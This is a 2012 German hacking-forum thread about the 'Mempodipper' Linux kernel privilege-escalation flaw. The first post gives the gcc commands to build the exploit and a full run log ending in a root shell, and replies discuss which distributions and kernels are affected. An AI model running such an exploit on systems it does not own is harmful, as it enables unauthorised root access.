Gameboy9 (15.10.2015)
-
25.01.2012, 12:07 #1
- Registriert seit
- 18.11.2011
- Beiträge
- 527
Thanked 668 Times in 451 PostsLinux: Root-Rechte durch Speicherzugriff
Linus Torvalds hat letzte Woche ein Linux-Kernel-Update veröffentlicht, das einen Fehler bei der Zugriffskontrolle auf Speicherabbilder beheben soll. Kurz darauf tauchten Exploits auf, die es ermöglichen, über diesen Fehler Root-Rechte zu erlangen.
Für alle die Ihr 64bit LInuxsystem mal testen wollen: heise online | Linux: Root-Rechte durch Speicherzugriff
Code:gcc mempodipper.c -o mempodipper ./mempodipper =============================== = Mempodipper = = by zx2c4 = = Jan 21, 2012 = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/12439/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Ptracing su to find next instruction without reading binary. [+] Resolved exit@plt to 0x401ce8. [+] Calculating su padding. [+] Seeking to offset 0x401cdc. [+] Executing su with shellcode. sh-4.2# id uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),115(lpadmin),117(admin),122(sambashare) sh-4.2#
Code:gcc -Wall -g -static mempodipper.c -o mempodipper_static
-
25.01.2012, 12:22 #2
- Registriert seit
- 28.10.2011
- Beiträge
- 625
Thanked 279 Times in 168 PostsAW: Linux: Root-Rechte durch Speicherzugriff
Anscheinend iszt da aber nicht jede Distribution von betroffen. Laut aussagen nur für Ubuntu(?), keine ahnung..
-
25.01.2012, 12:30 #3
AW: Linux: Root-Rechte durch Speicherzugriff
Ubuntu und Redhat (Halt alle die, die den Kernel nutzen). Debian nutzt noch ältere Kernel Versionen. Ab 2.6.39 ist der Kernel Vuln.
Geändert von Ta1lor (25.01.2012 um 12:32 Uhr)
-
The Following User Says Thank You to Ta1lor For This Useful Post:
Ähnliche Themen
-
Win7 Fehlende Rechte?
Von dGL im Forum WindowsAntworten: 2Letzter Beitrag: 04.06.2013, 19:11 -
ROOT Rechte auf Samsung Galaxy Note 2?
Von ZarneXxX im Forum AndroidAntworten: 3Letzter Beitrag: 16.01.2013, 15:48 -
Busfahrer Rechte
Von Mr.Bombastic im Forum Recht- und VerbraucherschutzAntworten: 13Letzter Beitrag: 29.09.2012, 19:45 -
TS Rechte fehlen
Von Prinzessin Paat im Forum SupportAntworten: 1Letzter Beitrag: 14.04.2012, 10:53 -
Verschenke Root Server mit Windows/Linux
Von Electro im Forum VerschenkeAntworten: 14Letzter Beitrag: 11.03.2012, 21:35
Diese Seite nutzt Cookies, um das Nutzererlebnis zu verbessern. Klicken Sie hier, um das Cookie-Tracking zu deaktivieren.